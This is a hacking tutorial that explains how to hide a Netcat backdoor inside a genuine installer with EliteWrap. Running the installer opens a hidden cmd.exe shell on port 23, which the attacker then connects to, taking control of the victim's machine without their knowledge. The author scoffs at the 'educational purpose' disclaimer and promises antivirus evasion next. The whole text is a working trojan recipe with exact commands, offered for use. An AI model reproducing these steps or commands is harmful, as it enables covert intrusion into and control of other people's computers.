Using Netcat: The Covert Way
Netcat is a really useful tool. It is also featured with network debugging conventions and also used to conduct investigation on network. We can open connection on any port and we can start listening and writing data from one computer to another. When It was first taught to me, I was very curious to know about it and the first thought on the back of my mind came was how to use it Covertly and compromise the system without the user intervention. I made this tutorial in order to show you how you can eventually send it over the wire to any computer and make the target machine listen and connect back to you. But better watch out, it’s a powerful tool and this is for only “Educational purpose” as “they ” say…hahaha!
So Before reading the below tutorial you should already know about Netcat and its capabilities because I won’t be telling you that here. Reading or performing this with insufficient knowledge wouldn’t work.So Be well aware before performing this.
- EliteWrap(A rich featured wrapper which can wrap more than one program into a single program.)
- Netcat (Windows version if you’re trying to create backdoor in windows)
- Use netstat -an command to know the open ports and listening ports on the system.
- Make sure that netcat.exe or nc.exe is in the same folder as Elitewrap.
- Now, Open Elitewrap in command line.Once the EliteWrap starts, it will ask for the output file name. Give any file name that you want to give it can be anything you’d like.
- The next step that follows will show ask you “Enter package #1”, Enter the genuine exe file that you want it to open. That file could be anything that the user wants. Here in the example I gave a browser setup.
- Use 6th option from the drop down menu. Because we want that particular software to be seen or to be visible by the user. Next It will ask for the command line, well you don’t need to fill it press Enter.
- In the next step we need to provide a backdoor which will be Netcat. Write nc.exe in the “Enter the package #2″. In the package option select 7th option because we want it to be hidden and unseen. Next you will be asked for Command Line, Enter this ” -l -p 23 -t -e cmd.exe “.
- It is done for now. Now you just need the target to click on that particular program that you created just now.
- The target have started the setup as you can see.
- As you can see “0.0.0.0:23″ ” LISTENING”.Our netcat session has been started after the target user clicked on the setup we created.
- In the attackers machine start netcat and connect to the target computer “netcat -v -n 192.168.65.132 23”.
- As you can see we are now provided with the COMMAND LINE PROMPT of the attacker’s system and you can now do whatever you want.
- Write netstat -an to check the connection. and YES! we are actually connected to target.
- Now to prove that I have control over the target,I have created a directory called “hacker_stuff” on the desktop and then closed the current connection using CTR+C.
- The Folder on the desktop has been created as you can see in the image below.
Elite wrapper is great when used with no antivirus or on older/out-dated antivirus. But we have numerous ways to find and make the Trojan program FUD Fully Un-Detectable. I will be talking about that in next session. Like I always say be a wise person and do not use these things unless you have a better reason to do so. With netcat you can also make TFTP connection and can download/ upload or read/write the files from target to your pc and vice-versa. I am providing you with a PDF on NETCAT .Read it and let your imagination go wild.
Try this yourself and learn about whatever steps you take and why you take. This is not gonna happen in one try. If it happens in one try then it would be just Beginner’s Luck. Keep trying and Don’t Stop until You’re Finished.
Stay Anonymous! :)